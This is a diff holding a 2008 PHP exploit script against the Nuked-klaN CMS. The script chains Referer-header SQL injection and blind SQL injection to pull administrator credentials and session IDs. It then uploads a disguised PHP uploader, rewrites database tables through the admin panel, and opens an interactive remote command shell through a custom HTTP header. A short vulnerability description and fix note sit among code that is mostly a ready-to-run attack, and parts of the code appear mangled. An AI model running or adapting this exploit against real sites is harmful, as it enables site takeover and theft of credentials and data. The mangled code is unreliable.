-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		   
-		$urlarr     = parse_url($urltarg);
-		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		if(!isset($urlarr['path']) or empty($urlarr['path']))
-		   die("Error: No path precised");
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->get($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->get($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array();
-			break;
-				
-			case 'cookie':
-			$this->cookie = array();
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array();
-			$this->cookie = array();
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-?>
-
-# milw0rm.com [2008-10-14]
+
+# URL:     http://real.o-n.fr/
+# Date:    14/10/2008
+#
+# Special thanks to Louis for remembering me I had to finish it =)
+#
+# VULNERABILITY DETAILS
+# ---------------------
+#
+# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not
+# correctly  filtered  before being inserted in  nuked_stats_visitor table.
+#
+# If HTTP headers are not addslashes()'d by PHP,  it could lead to a INSERT
+# SQL injection.
+#
+# In function view_referer() (visits.php),  referers are extracted from the 
+# database to perform an other SQL query, without being secured in between.
+# This leads to a blind SQL injection.
+#
+# Theses injections are  only possible if Nuked-klaN (NK) considers us as a
+# new user, because else it won't touch the nuked_stats_visitor table.
+# For this,  we can use X-Forwarded-For HTTP header to specify NK a new IP,
+# to be considered as a new user, and therefore access the database.
+# NK automaticaly tries to resolve our host (using gethostbyaddr()), and it
+# could be very long if the IP is not corresponding to a real one,  because
+# the default timeout is ~3 seconds, and that's very unconvenient for blind
+# SQL injection.
+# In order to solve this,  we can try to  generate IPs that might be valid,
+# using, for example, a known BASE (the first two numbers), and randomizing
+# the two other numbers.
+#
+# Stats can be disabled, or not accessible for users or visitors.
+# In the last case we can't get query results,  so the unique way to inject
+# is BENCHMARK method, but this implies that the headers are not addslashed
+# by PHP, but this method is not implemented in this exploit.
+#
+# If we got an admin session or login, we can spawn a remote shell/uploader
+# using the NK "MySQL administration",  but PHP safe_mode must be disabled.
+#
+# This exploit uses  all these vulnerabilities to spawn a shell/uploader or
+# to simply obtain admin credentials.
+#
+# EXPLOIT MAP
+# -----------
+#
+# (ERRORS ARE THIS WAY ->)
+# 
+# +---------------------------+
+# | Check stats accessibility |->exit()
+# +---------------------------+
+#   |
+#   |  +---------------------------------+  +-----------------------------------------------+
+#   +->| Spoof referer to corrupt INSERT |->| Spoof referer to corrupt view_referer() query |->exit()
+#      | query and look for results      |  | (blind sql injection)                         |
+#      +---------------------------------+  +-----------------------------------------------+
+#        |                                    |
+#        |  +--------------------------+      | +---------------------------------------------+
+#        +->| Did we find an admin SID |<-----+ | We only have a login and a hashed password, |
+#           | or not ?                 |------->| we have to crack it and use -admin          |
+#           +--------------------------+        +---------------------------------------------+
+#             |
+#             |  +-------------------------------------------------+
+#             +->| Login as admin and spawn an uploader or a shell |
+#                | using "MySQL administration"                    |
+#                +-------------------------------------------------+
+#
+# SOLUTION
+# --------
+# The best way to secure your Nuked-klaN is disabling stats using the admin
+# panel.
+# If you wan't to keep stats activated, you have to addslashes HTTP_REFERER
+# in nuked.php and in visits.php.
+#
+#
+# THIS IS FOR EDUCATION PURPOSES ONLY, as usual.
+#
+
+error_reporting(E_ALL ^ E_NOTICE);
+
+define('MSG_INFO', 1);
+define('MSG_OKAY', 2);
+define('MSG_ERROR', 3);
+define('MSG_QUESTION', 4);
+
+define('AGENT', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16');
+define('IPBASE', '82.237.');
+
+define('UPCODE', '\')) exit(\'--NOTDONE--\');fclose($h);exit(\'--DONE--\');}else{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>');
+define('SHCODE', '');
+
+$nk = new nk();
+
+class nk
+{
+	var $proxy;
+	
+	var $user;
+	var $admin;
+	var $suser;
+	var $sadmin;
+	var $mode;
+	var $url;
+	var $year;
+	
+	var $ips = array();
+	var $queries;
+	var $www;
+	
+	function nk()
+	{
+		$this->header();
+		$this->usage();
+		
+		$this->setParameters();
+		$this->controlParameters();
+		
+		$this->main();
+	}
+	
+	function close()
+	{
+		$this->msg();
+		exit(0);
+	}
+	
+	# Main function, what and when.
+	function main()
+	{
+		# Admin login not specified
+		if(!$this->sadmin)
+		{
+			$this->setQueries(0);
+			$this->checkStatsAccessibility();
+			$this->sendInsertQuery();
+		
+			# Got the credentials =)
+			if($this->getCredentials())
+			{
+				$this->dumpCredentials();
+			}
+			elseif($this->blindQueries())
+			{
+				if($this->mode != 2 && !$this->admin['sid'])
+				{
+					$this->msg('There is no active admin session, try with "-mode 2"', MSG_ERROR);
+					exit();
+				}
+				
+				$this->file = str_replace('$_SERVER[\'HTTP_SHELL\']', 'stripslashes($_SERVER[\'HTTP_SHELL\'])', $this->file);
+			}
+			# No attack worked
+			else
+			{
+				$this->msg('Exploit failed, stats might be disabled.', MSG_ERROR);
+				exit();
+			}
+		}
+		
+		$this->makeadmin();
+		$this->conclude();
+	}
+	
+	# Define queries in function of the current mode
+	function setQueries($mode)
+	{
+		$this->queries   = array();
+		
+		if(!$mode)
+		{
+			# User queries
+			$this->queries['name']     = 'SELECT pseudo FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
+			$this->queries['password'] = 'SELECT pass FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
+			
+			# Session queries
+			if($this->mode != 2)
+			{
+				$this->queries['uid'] = 'SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1';
+				$this->queries['sid'] = 'SELECT id FROM sessions WHERE user_id=(SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1) ORDER BY DATE DESC LIMIT 1';
+			}
+		}
+		else
+		{
+			list($day, $month, $year) = explode(':', date('d:m:Y'));
+			$this->queries[] = 'ALTER TABLE block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;';
+			$this->queries[] = 'UPDATE block SET type=0x2f2e2e2f2e2e2f2e2e2f00 WHERE type=0x6c6f67696e OR type LIKE 0x252f2e2e25 AND active!=0 LIMIT 1;';
+			$this->queries[] = 'DELETE FROM stats_visitor WHERE (day=' . $day . ' AND month=' . $month . ' AND year=' . $year . ') OR year=' . $this->year . ' OR year=0;';
+		}
+		
+		# Set the SQL prefix
+		foreach($this->queries as $k => $v)
+			$this->queries[$k] = str_replace('', $this->sprefix, $v);
+	}
+	
+	# Informs of the stats accessibility
+	function checkStatsAccessibility()
+	{
+		$this->msg('Checking statistics accessibility ...', MSG_INFO, false);
+		
+		$accessibility = $this->areStatsReachable();
+		
+		if($accessibility == 1)
+		{
+			$this->msg('Statistics are reachable, but require authentification', MSG_OKAY);
+			
+			if(!$this->suser)
+			{
+				$this->msg('Please create an user and specify it using -user parameter', MSG_ERROR);
+				exit();
+			}
+			else
+			{
+				$this->makeuser();
+			}
+		}
+		elseif($accessibility == 0)
+		{
+			$this->msg('Statistics are reachable as a visitor', MSG_OKAY);
+		}
+		else
+		{
+			$this->msg('Statistics are NOT reachable or activated', MSG_ERROR);
+			exit();
+		}
+	}
+		
+	# Determine if stats are accessible, and under which conditions
+	function areStatsReachable()
+	{
+		$this->wwwinit(0);
+		$this->www->addheader('Referer', 'http://test.com/');
+		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer');
+		
+		if(preg_match('#[^<]+#i', $this->www->getcontent()))
+			return -1;
+		if(preg_match('#[^<]+#i', $this->www->getcontent()))
+			return 1;
+			
+		if(!preg_match('#http://test\.com/#i', $this->www->getcontent()))
+			return -1;
+		
+		return 0;
+	}
+	
+	# Send the spoofed referer in order to insert interresting
+	# informations in the nuked_stats_visitors table
+	function sendInsertQuery()
+	{
+		$time = time()+60;
+		
+		$this->msg('Sending INSERT query ...', MSG_INFO, false);
+		
+		# End the first row
+		$sql  = "http://google.com/', '', '', '', '', '0'), ";
+		
+		# For each query, a new row
+		foreach($this->queries as $key => $query)
+		{
+			$sql .= "('', '', '0.0.0.0', 'attack', 'Mozilla', 'Windows', CONCAT(''), '1', '1', '" .$this->year . "', '1', '$time'), ";
+		}
+		
+		# End this with the beginning of a row, to have a valid SQL query
+		$sql .= "('', '', '', '', '', '', '";
+		
+		# Let's send it
+		$this->wwwinit(0);
+		$this->www->addheader('Referer', $sql);
+		$this->www->get($this->url);
+		
+		$this->msg('Sent INSERT query       ', MSG_OKAY);
+	}
+	
+	# Get insert query result in stats page, credentials
+	function getCredentials()
+	{
+		$this->admin = array();
+		
+		$this->msg('Retrieving credentials ...', MSG_INFO, false);
+		
+		$this->wwwinit(1);
+		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=' . $this->year);
+		
+		if(!preg_match_all('##Ui', $this->www->getcontent(), $data))
+		{
+			$this->msg('Unable to reach credentials', MSG_ERROR);
+			return false;
+		}
+		
+		for($i=0;$iadmin[$data[1][$i]] = $data[2][$i];
+		}
+			
+		$this->msg('Got the credentials =)    ', MSG_OKAY);
+		
+		return true;
+	}
+	
+	# Dump $this->user content
+	function dumpCredentials()
+	{
+		$display = array
+		(
+			'User      : ' => 'name',
+			'Password  : ' => 'password',
+			'UserID    : ' => 'uid',
+			'SessionID : ' => 'sid',
+		);
+		
+		foreach($display as $key => $value)
+			if($this->admin[$value])
+				$this->msg($key . $this->admin[$value], MSG_OKAY);
+	}
+	
+	# Here we are on the second attack: we have to blind, but only
+	# critical information because it's pretty long
+	function blindQueries()
+	{
+		$this->msg('Switching to blind mode, be (very) patient ...', MSG_INFO);
+		
+		if($this->mode != 2)
+		{
+			unset($this->queries['name']);
+			unset($this->queries['password']);
+		}
+		
+		foreach($this->queries as $key => $query)
+		{
+			$length = $key == 'password' ? 32 : 20;
+			
+			if($key == 'sid')
+			{
+				$query = str_replace
+				(
+					'(' . $this->queries['uid'] . ')',
+					"'" . $this->admin['uid'] . "'",
+					$query
+				);
+			}
+				
+			switch($key)
+			{
+				case 'name':     $display = 'User      : '; break;
+				case 'password': $display = 'Password  : '; break;
+				case 'sid':      $display = 'SessionID : '; break;
+				case 'uid':      $display = 'UserID    : '; break;
+			}
+			
+			$this->msg($display, MSG_QUESTION, false);
+			if(!($this->admin[$key] = $this->blind($query, $length))) return true;
+			$this->msg($display . $this->admin[$key], MSG_OKAY);
+		}
+		
+		return true;
+	}
+	
+	# SQL Blind function
+	# Referer SQL field only supports 200 characters,
+	# so we use a special sql injection to be sure it
+	# will work fine and fast enought.
+	#
+	# 1. Charset
+	# 2. Dichotomy
+	#
+	function blind($query, $nbchars)
+	{
+		$result  = '';
+		
+		for($p=1;$p<=$nbchars;$p++)
+		{
+			$letter = '';
+			$sql    = "MID(($query),$p,1)";
+			
+			if($this->blind_is($sql))
+			{
+				if($this->blind_isChar($sql))
+				{		
+					if($this->blind_isMaj($sql))
+						$charset = array(ord('A'), ord('Z'));
+					else
+						$charset = array(ord('a'), ord('z'));
+				}
+				else
+					$charset = array(ord('0'), ord('9'));
+			}
+			else
+				break;
+				
+			$add = $charset[0];
+			
+			for($pos=$charset[1]-$charset[0];$pos>2;$pos=intval($pos/2+0.5))
+			{
+				$s = 'ORD(' . $sql . ') BETWEEN ' . $add . ' AND ' . ($add+$pos);
+				if(!$this->blind_test($s)) $add += $pos;
+			}
+			
+			$letter = '';
+			
+			for($i=$add;$i<=$add+$pos+1;$i++)
+			{
+				$s = 'ORD(' . $sql . ')=' . $i;
+				if($this->blind_test($s))
+				{
+					$letter = chr($i);
+					break;
+				}
+			}
+			
+			$result .= $letter;
+			print $letter;
+		}
+		
+		return $result;
+	}
+	
+	function blind_is($sql)
+	{
+		return $this->blind_test("ORD($sql)!=0");
+	}
+	
+	function blind_isChar($query)
+	{
+		return $this->blind_test("UPPER($query) BETWEEN 'A' AND 'Z'");
+	}
+	
+	function blind_isMaj($query)
+	{
+		return $this->blind_test("ORD($query) BETWEEN 65 AND 90");
+	}
+	
+	# Return true or false depending on the page result, before
+	# setting up PHPsploit and the referer
+	function blind_test($sql)
+	{
+		$site = $this->generateIP();
+		$when = '&oday=' . date('d') . '&omonth=' . date('m') . '&oyear=' . date('Y');
+		
+		$this->wwwinit(0);
+		$this->www->addheader('Referer', $this->year . $site . "' OR 1=1 AND $sql AND 'A'='A");
+		
+		# If we have to be user to reach stats
+		if(sizeof($this->user))
+		{
+			$this->www->get($this->url . 'index.php');
+			$this->wwwinit(1);
+		}
+			
+		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer' . $when);
+		
+		if(preg_match('#' . $this->year . $site . '[^<]+\s+([0-9]*)#i', $this->www->getcontent(), $data))
+		{
+			if($data[1] > 0)
+				return true;
+		}
+		else
+		{
+			$this->msg('Error while blinding.', MSG_ERROR);
+			exit();
+		}
+	}
+		
+	# Set up the admin
+	function makeadmin()
+	{
+		# The current user is now the admin
+		$this->user = $this->admin;
+		
+		# Determine if we have a session or just a name
+		if($this->mode == 2)
+		{
+			exit();
+		}
+		elseif($this->sadmin)
+		{
+			$this->suser = $this->sadmin;
+			$this->makeuser();
+		}
+		elseif($this->user['sid'] && $this->user['uid'])
+		{
+			$this->msg('Got a session, no login required', MSG_OKAY);
+		}
+		elseif($this->user['name'] && $this->user['password'])
+		{
+			$this->msg('Please crack the admin hash, and use -admin parameter', MSG_ERROR);
+			exit();
+		}
+		else
+		{
+			$this->msg('How did you get there ?', MSG_ERROR);
+			exit();
+		}
+		
+		$this->user['aid'] = $this->user['uid'];
+		$this->user['ip']  = '127.0.0.1';
+		
+		$this->msg('Administrator status OK =)', MSG_OKAY);
+	}
+	
+	# Conclude the attack: spawn a shell or an uploader
+	function conclude()
+	{
+		# Initialise PHPsploit for the last time
+		$this->wwwinit(1);
+		$this->www->addheader('Referer', $this->url);
+		
+		# Actualize the queries
+		$this->setQueries(1);
+		
+		$this->uploadavatar();
+		$this->sendqueries();
+		$this->loadshell();
+	}
+	
+	function uploadavatar()
+	{
+		$this->msg('Uploading avatar ...', MSG_INFO, false);
+		
+		$fmdt = array
+		(
+			'frmdt_url'   => $this->url . 'index.php?file=User&op=update_pref',
+			'fichiernom'  => array
+							(
+								'frmdt_filename' => 'one.jpg',
+								'frmdt_content'  => $this->file,
+							)
+		);
+
+		$this->www->formdata($fmdt);
+		$this->www->get($this->url . 'index.php?file=User&op=edit_pref');
+		
+		if(!preg_match('#value="([^"]+\.jpg)"#U', $this->www->getcontent(), $match))
+		{
+			$this->msg('Error while uploading avatar', MSG_ERROR);
+			exit();
+		}
+		
+		$this->msg('Avatar successfully uploaded (' . basename($match[1]) . ')', MSG_OKAY);
+		
+		$match = unpack('H*', $match[1]);
+		
+		$this->queries[1] = str_replace('', $match[1], $this->queries[1]);
+	}
+	
+	function sendqueries()
+	{
+		$this->msg('Sending SQL queries ', MSG_INFO, false);
+		
+		foreach($this->queries as $query)
+		{
+			$this->www->post($this->url . 'index.php?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $query);
+			$this->msg('.', 0, false);
+		}
+		
+		$this->msg('SQL queries sent        ', MSG_OKAY);
+	}
+	
+	function loadshell()
+	{
+		if($this->mode == 0)
+		{
+			$this->www->addheader('Shell', '1');
+			$this->www->get($this->url);
+			
+			if(strpos('--DONE--', $this->www->getcontent()))
+				$this->msg('File created. URL: ' . $this->url . 'w00t.php', MSG_OKAY);
+			else
+			{
+				# possible causes: safe_mode, open_basedir, file restrictions ...
+				$this->msg('File was not created', MSG_ERROR);
+			}
+		}
+		else
+		{
+			$this->msg('Shell spawned', MSG_OKAY);
+			$this->msg();
+			$sql = array('conf.inc.php', '$global[\'db_host\']', '$global[\'db_user\']', '$global[\'db_password\']', '$global[\'db_name\']');
+			new phpreter($this->url . 'index.php', '123456789(.*)123456789', 'cmd', $sql, false);
+		}
+	}
+	
+	# Login as a specified user, and obtain a $uid and a $sid
+	function createSession($user, $passwd, &$uid, &$sid)
+	{
+		$this->wwwinit(0);
+		$this->www->addheader('Referer', $this->url . 'index.php');
+		$this->www->post($this->url . 'index.php?file=User&nuked_nude=index&op=login', "pseudo=$user&pass=$passwd&remember_me=ok");
+		
+		preg_match('#nuked_sess_id=([a-z0-9]+)#i', $this->www->getheader(), $sid);
+		preg_match('#uid=([a-z0-9]+)#i', $this->www->getcontent(), $uid);
+		
+		$sid = $sid[1];
+		$uid = $uid[1];
+		
+		if($uid && $sid)
+			return true;
+		
+		return false;
+	}
+	
+	# Login user and set his informations
+	function makeuser()
+	{	
+		list($user, $passwd) = explode(':', $this->suser);
+		
+		$this->user = array();
+		
+		$this->msg('Logging in as ' . $user, MSG_INFO, false);
+		
+		if($this->createSession($user, $passwd, $uid, $sid))
+		{
+			$this->user['name']     = $user;
+			$this->user['password'] = $passwd;
+			$this->user['uid']      = $uid;
+			$this->user['sid']      = $sid;
+			$this->user['ip']       = $this->generateIP();
+			
+			$this->msg('Loggued in as ' . $user . ' (uid=' . $uid . ')', MSG_OKAY);
+		}
+		else
+		{
+			$this->msg('Unable to log in as ' . $user, MSG_ERROR);
+			exit();
+		}
+	}
+	
+	# Initialize PHPsploit (with a new identity)
+	function wwwinit($mode)
+	{	
+		$this->www->reset();
+		$this->www->agent(AGENT);
+		
+		if($mode && sizeof($this->user))
+			$this->wwwuser();
+		else
+			$this->www->addheader('X-Forwarded-For', $this->generateIP());
+	}
+
+	# Set user cookies and headers
+	function wwwuser()
+	{	
+		$cookies = array();
+		
+		if($this->user['uid']) $cookies['user_id']       = $this->user['uid'];
+		if($this->user['sid']) $cookies['sess_id']       = $this->user['sid'];	
+		if($this->user['aid']) $cookies['admin_session'] = $this->user['aid'];
+			
+		foreach($cookies as $k => $v)
+			$this->www->addcookie($this->cprefix . $k, $v);
+		
+		// yes it's not a cookie
+		$this->www->addheader('X-Forwarded-For', $this->user['ip']);
+	}
+	
+	# Make an IP which can be gethostbyaddr()'ed, for speed
+	# reasons
+	function generateIP()
+	{
+		do
+		{
+			$ip = IPBASE . rand(1, 20) . '.' . rand(1, 250);
+		}
+		while(in_array($ip, $this->ips));
+		
+		$this->ips[] = $ip;
+		
+		return $ip;
+	}
+	
+	function msg($msg = '', $type = 0, $n = true)
+	{
+		$display = $n ? "\r" : '';
+
+		switch($type)
+		{
+			case MSG_INFO:     $display .= '[*] '; break;
+			case MSG_OKAY:     $display .= '[+] '; break;
+			case MSG_ERROR:    $display .= '[-] '; break;
+			case MSG_QUESTION: $display .= '[?] '; break;
+		}
+
+		$display .= $msg;
+
+		$display .= $n ? "\n" : '';
+
+		print $display;
+	}
+	
+	function header()
+	{
+		$this->msg();
+		$this->msg('   Nuked-klaN 1.7.7 and SP4.4 Multiple Vulnerabilities Exploit');
+		$this->msg('     by Charles FOL ');
+		$this->msg();
+	}
+	
+	function usage()
+	{
+		global $argc;
+		
+		if($argc<3)
+		{
+			$this->msg(' usage: ./nk_exploit.php -url  [options]');
+			$this->msg();
+			$this->msg(' Options: -mode    0: Remote Upload (default)');
+			$this->msg('                   1: Remote Code Execution');
+			$this->msg('                   2: Admin Hash Extraction');
+			$this->msg('          -admin   If you have an admin account.');
+			$this->msg('          -user    If stats page need registration.');
+			$this->msg('          -proxy   If you want to use a proxy.');
+			$this->msg('          -cprefix Cookie prefix (default: nuked_).');
+			$this->msg('          -sprefix SQL prefix (default: nuked_).');
+			$this->msg('          -file    If you wanna upload a specific file');
+			$this->msg('                   else it will upload a simple uploader.');
+			$this->msg();
+			$this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd');
+			$this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118');
+			
+			$this->close();
+		}
+	}
+	
+	function setParameters()
+	{
+		$this->www     = new phpsploit();
+		$this->year    = rand(1000, 1500);
+		$this->url     = $this->getParameter('url', true);
+		$this->mode    = $this->getParameter('mode', false, 0);
+		$this->suser   = $this->getParameter('user', false);
+		$this->sadmin  = $this->getParameter('admin', false);
+		$this->proxy   = $this->getParameter('proxy', false);
+		$this->cprefix = $this->getParameter('cprefix', false, 'nuked_');
+		$this->sprefix = $this->getParameter('sprefix', false, 'nuked_');
+		$this->file    = $this->getParameter('file', false);
+	}
+	
+	function controlParameters()
+	{
+		if($this->mode == 0)
+		{
+			if($this->file)
+				$this->file = file_get_contents($this->file);
+			else
+				$this->file = 'Error ".$_FILES[\'file\'][\'error\''
+				            . ']."
    ");else echo "
    File uploaded
    "; } ?>
    ';
+
+			$this->file = str_replace('', str_replace("'", "\'", $this->file), UPCODE);
+		}
+		else
+			$this->file = SHCODE;
+		
+		if($this->proxy)
+			$this->www->proxy($this->proxy);
+	}
+	
+	function getParameter($parameter, $required = false, $default = '')
+	{
+		global $argv, $argc;
+		
+		for($i=0;$i<$argc;$i++)
+		{
+			if($argv[$i] == '-' . $parameter)
+				return $argv[$i+1];
+		}
+		
+		if($required)
+		{
+			$this->msg('-' . $parameter . ' parameter is required.', MSG_ERROR);
+			$this->close();
+		}
+		
+		return $default;
+	}
+}
+
+# PHPreter (a bit modified).
+# Find original version on http://real.o-n.fr/
+
+/*
+ * Copyright (c) Charles FOL
+ *
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ *
+ * TITLE:          PHPreter
+ * AUTHOR:         Charles FOL 
+ * VERSION:        1.0
+ * LICENSE:        GNU General Public License
+ *
+ * This is a really simple class with permits to exec SQL, PHP or CMD
+ * on a remote host using the HTTP "Shell" header.
+ *
+ *
+ * Sample code:
+ * [host][sql]# mode=cmd
+ * [host][cmd]# id
+ * uid=2176(u47170584) gid=600(ftpusers)
+ * 
+ * [host][cmd]# mode=php
+ * [host][php]# echo phpversion();
+ * 4.4.8
+ * [host][php]# mode=sql
+ * [host][sql]# SELECT version(), user()
+ * --------------------------------------------------
+ *  version()           | 5.0.51a-log
+ *  user()              | dbo225004932@74.208.16.148
+ * --------------------------------------------------
+ * 
+ * [host][sql]#
+ *
+ */
+
+class phpreter
+{
+	var $url;
+	var $host;
+	var $port;
+	var $page;
+	
+	var $mode;
+	
+	var $ssql;
+	
+	var $prompt;
+	var $phost;
+	
+	var $regex;
+	var $data;
+	
+	/**
+	 * __construct()
+	 *
+	 * @param url      The url of the remote shell.
+	 * @param regexp   The regex to catch cmd result.
+	 * @param mode     Mode: php, sql or cmd.
+	 * @param sql      An array with the file to include,
+	 *                 and sql vars
+	 * @param clear    Determines if clear() is called
+	 *                 on startup
+	 */
+	function phpreter($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
+	{
+		$this->url = $url;
+		
+		$this->regex = '#'.$regexp.'#is';
+		
+		#
+		# Set data
+		#
+		
+		$infos         =	parse_url($this->url);
+		$this->host    =	$infos['host'];
+		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
+		$this->page    =	$infos['path'];
+		
+		# www.(site).com
+		$host_tmp      =	explode('.',$this->host);
+		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
+		
+		#
+		# Set up MySQL connection string
+		#
+		if(!sizeof($sql))
+			$this->ssql = '';
+		elseif(sizeof($sql) == 5)
+		{
+			$this->ssql = "include('$sql[0]');"
+			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
+			            . "mysql_select_db($sql[4]);";
+		}
+		else
+		{
+			$this->ssql = ""
+			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
+			            . "mysql_select_db('$sql[3]');";
+		}
+		
+		$this->setmode($mode);
+		
+		#
+		# Main Loop
+		#
+
+		if($clear) $this->clear();
+		print $this->prompt;
+
+		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
+		{
+			# change mode
+			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
+				$this->setmode($array[3]);
+			
+			# clear data
+			elseif(preg_match('#^clear$#i',$cmd))
+				$this->clear();
+			
+			# else
+			else print $this->exec($cmd);
+			
+			print $this->prompt;
+		}
+	}
+	
+	/**
+	 * clear()
+	 * Just clears ouput, printing '\n'x50
+	 */
+	function clear()
+	{
+		print str_repeat("\n", 50);
+		return 0;
+	}
+	
+	/**
+	 * setmode()
+	 * Set mode (PHP, CMD, SQL)
+	 * You don't have to call it.
+	 * use mode=[php|cmd|sql] instead,
+	 * in the prompt.
+	 */
+	function setmode($newmode)
+	{
+		$this->mode = strtolower($newmode);
+		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
+		
+		switch($this->mode)
+		{
+			case 'cmd':
+				$this->data = 'system(\'\');';
+				break;
+			case 'php':
+				$this->data = '';
+				break;
+			case 'sql':
+				$this->data = $this->ssql
+				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
+				            . 'print str_repeat("-",50)."\n";'
+				            . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
+				            . '{'
+				            .    'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
+				            .    'print str_repeat("-",50)."\n";'
+				            . '}';
+				break;
+		}
+		return $this->mode;
+	}
+
+	/**
+	 * exec()
+	 * Execute any query and catch the result.
+	 * You don't have to call it.
+	 */
+	function exec($cmd)
+	{
+		if(!strlen($this->data))	$shell = $cmd;
+		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
+		
+		$fp = fsockopen($this->host, $this->port, $errno, $errstr, 30);
+		
+		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
+		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
+		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+		$req .= "X-Forwarded-For: 127.0.0.1\r\n"; // here is the mod.
+		$req .= "Shell: $shell\r\n";
+		$req .= "Connection: close\r\n\r\n";
+
+		fputs($fp, $req);
+		
+		$content = '';
+		while(!feof($fp)) $content .= fgets($fp, 128);
+		
+		fclose($fp);
+		
+		# Remove headers
+		$data    = explode("\r\n\r\n", $content);
+		$headers = array_shift($data);
+		$content = implode("\r\n\r\n", $data);
+		
+		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
+			$content = $this->unchunk($content);
+	
+		preg_match($this->regex, $content, $data);
+		
+		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
+		
+		return $data[1];
+	}
+	
+	/**
+	 * unchunk()
+	 * This function aims to remove chunked content's sizes which
+	 * are put by the apache server when it uses chunked
+	 * transfert-encoding.
+	 */
+	function unchunk($data)
+	{
